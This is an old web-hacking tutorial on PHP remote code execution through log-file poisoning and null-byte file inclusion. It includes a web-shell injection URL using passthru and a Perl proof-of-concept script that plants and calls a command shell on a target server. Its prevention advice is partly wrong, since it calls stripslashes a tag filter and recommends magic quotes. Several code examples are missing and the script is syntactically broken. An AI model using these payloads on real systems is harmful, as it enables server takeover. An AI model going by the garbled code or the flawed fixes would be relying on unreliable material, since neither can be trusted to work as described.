x41 - Introduction
x42 - Basics Of Remote Code Execution And How It Develops
x43 - Exactly How An Attacker Get Advantage Over This Vulnerability And Misuse It!
x44 - Prevention And Filtration
x45 - Conclusion

x41 - Introduction

Remote Code Execution Is Yet Another Common Vulnerability
existing is wide range of web apps in the current era.It allows a remote
attacker to execute arbitrary code in the sytem
with administrator privelages without the attention of
the owner of the targetted site.It's just not a-hole-to-avoid, but an
extremely risky vulnerability,which can endanger your site to different attacks,malicious deletion of data,even worst Defacing!

x42 - Basics Of Remote Code Execution And How It Develops 
Basic Remote Code Executions:
Now I will highlight some basics remote code executions
being planted that exist still in this era of web app development.

We will now examine a comment form getting comments from a user("submit.php") 
and posting it at "comments.php" 

We Are analyzing submit.php with simple post method that submits the gathered
user input and forward the request to

<form method="POST" action="">
<textarea rows="10" name="comments" cols="60"></textarea>
<p><input type="submit" value="Post" name="sub"></p>


$comments = $_POST['comments'];
$log = fopen('comments.php','a');
fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments);

Now by just looking at it, we could very easily proove it as insane! How??
Well,as we can see there is a form that submits
a user inputted(what-so-ever) comments to comments.php including malicious which
writes the comments exactly as user's input
witout being sanitized.This means that an attacker here is getting full
advantage to exploit the vulnerable comments
submission form by executing some malicious request, which could be just to gather server details like using phpinfo()
which is an exceptional case for attackers these days,or even more pathetic could be getting a shell on a vulnerable server.

We will take another example using GET request to display error message and log the ip with the specific message.
(it's a common vulnerability planted by the coder while developing a website for an organization,etc).'x'.


$msg = $_GET['msg'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('errorlog.php','a');
fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />');

This piece not only effect and vulnerable to remote code execution but also to several other attacks including xss,javascript injection,vbscript injection etc.
This will too allow a remote attacker to posion the log file and inject 
malicious code to the logs. 
Now I will highlight another type of remote code execution can also be defined as posioning the cookies


It can be just more complicated than that, like most possibly there can be usage of sessions to verify admin if the
variable "admin" would match "1", how ever this is just an sql query used to select administrator as the user when
admin = 1 The query is giving possibly another vulnerability Yeah, right "Sql INJection!";
Remote Code Execution is also possible through headers deposition or an
arbitrary file upload if theres a file processing system and is not sanitized.

x43 - Exactly How An Attacker Get Advantage Over This Vulnerability And Misuse It!
I will highlight exactly how an attacker manage to do this 

Likely supposing an attacker finding a vulnerable target and he got hold of the news that a GET variable have been
implemented here in order to log a particular data to some specific file lets
say 'x'. The attacker will struggle to their
best to get hold of the file where the data is being wrote, path arrays are used by the attacker for successfull exploitation
and then of course the attacker will likely inject some malicious
string in order to check if it's filtering the output, in this case no it's not
doing any checkup or using htmlentities or
htmlspecialchars() funcs.So the attacker will likely get a hell lot of benefit
from this.Most probably he will try to spawn
a shell on the targetted server to gain full advantages of his or her blackhat stuff 
Supposing an attack on the slave host


http://slave.xxx/info.php?msg=<? passthru($_GET['attacker']); ?>

This will do the work! 

In some other cases like the one "

if(!isset($admin == 1)

it could be also
exploited with great ease, the attacker just
have to spoof the variable from the server request and that's not at all
difficult being a GET variable :p



This will do it 
and for the cookies thingy it's same... just need to edit cookies and you are the master! 
Supposingly the below pattern:: 


//Some Authencation Headers Below

In this type of pattern, you just change the cookies to administrator and tada you are in as admin! 

It's better to handle the case with care.I will now write a little POC(Proof-Of-Concept) in order to explain
and exploit the target remotely and quite easily! It's not good but important to use such kind of script
to expoit the issue and execute the command successfully,since the browser will surely encode your tags, making
the request not at all efficient and successful!
The below script would bypass this, and fulfill it's purpose at all cost 



#Php Endangers - Remote Code Execution
#POC To inject and execute a malicious request, probably spawning and executing a shell command
use LWP::Simple; 
use LWP::UserAgent; 
sub header() 
{print q{ 

Usage <target> <vulnerable file> <variable> <log file> <shell> <command>
Example roc.pl info.php msg errorlog.php ls -la
}}$inject = "<?php if(get_magic_quotes_gpc()){ 
/$_GET[cmd]=stripslashes(/$_GET[cmd])/;} passthru(/$_GET[cmd])/; ?>"; 

#You may notice some additional funcs used to inject, these are to execute and produce 99% successful result
#it would help and bypass magic_quotes func and stripslashes too, that would possibly of lot good to the attacker!

if(@ARGV !=5){
}$target = @ARGV[0];

$file = @ARGV[1];
$var = @ARGV[2];
$log = @ARGV[3];
$shell = @ARGV[4];
$command = @ARGV[5];
$agent = LWP::UserAgent->new();
$exec = "http://$target/$file?$var=$inject";
$exec2 = "http://$target/$log?attacker=$shell&$cmd=$command?";
$agent->get("$exec2") or die"Host Seems Down";
print "Injected Successfully!!";
print "Check The Shell Manually At"." "."http://$target/$log?attacker=$shell&$cmd=$command?"; 

#An explanation POC for exploiting the roc(Remote CODE Execution) Vulnerability.



Null Bytes Injection:: 

In A Piece Of Code Like One Mentioned Below, It Would Be A Wonder To An Attacker How To Eliminate The Compulsory
File Extension And Exploit The Vulnerability Or Use The Inclusion To Execute A Shell Upon The Tagetted Server.

Now we can clearly declare the above code as a critical vulnerability, helping attacker to do a lfi or rfi depending
on the attacker's strategy.But it's clear that the inclusion would be failed
because of the extension increment issue.

Now the attacker would surely like this at all, and will try to elminate the
extension by using NULL BYTES Or Posioning null bytes in to the server.
Below is an example what exactly happens when a inclusion is performed in such case::

since the code is adding extensions after $file variable means it would be
adding .php after .txt, thus making the exploitation dumb,in simple it would make the request looks 


Where such case dont exist!
Now the attacker will eliminate the extension to successfully exploit the issue by posioning null bytes in the request 
made,below is how the attacker will manage to do so:: 



This would make the request eliminate the additional extension, and would 
successfully exploit the issue! 
x44 - Prevention And Filtration 

It's better to design what-so-ever form in such a way that it sanitizes and
filters a user input before writing or actually executing the request on the server. This can be done easily with the ease of php
built in htmlentities(); htmlspecialchars(); and most importantly strip_tags and stripslashes functions.
This Will abort a malicious request and will execute the request after the
malicious tags had been aborted.
For instance an attacker trying to inject a piece of code 'y' to a GET


http://slave.xxx/file.php?var=<? phpinfo(); ?>

now if the file is under htmlentities,htmlspecialchars,strip_tags or
stripslashes() protection, then this will make the
request of the attacker totally dumb and of course of no use!
Supposingly a simple filtration pattern: 



$data = stripslashes($_GET['data']);
$fh = fopen('file.php','a');

This will abort the tags "<?", "?>","()" and ofcourse will make the rest of the piece of code of no use since "phpinfo" is not insane or looks malicious the server will only write that in exact ascii form to the file.

There are even better cures by using magicquotes on, how ever it can cause some other complicated problems if not used properly,
so it's not recommended to beginners until they know what they are doing.
x45 - Conclusion 
I have used several examples to explain the basics of remote code execution and
exactly how it's planted in web apps.
I have tried my level best to explain the terms and consequences in simple and easy words including all piece of codes
mentioned here.However I don't hold any responsibility of any misuse or
dirtyworks performed by gaining the knowledge within the paper.Beside this, I strongly recommend all to go through it, it's simple and easy and will awoke the dangers that can be encountered by little careless mistakes!

SOURCE : maDLeeTs.Com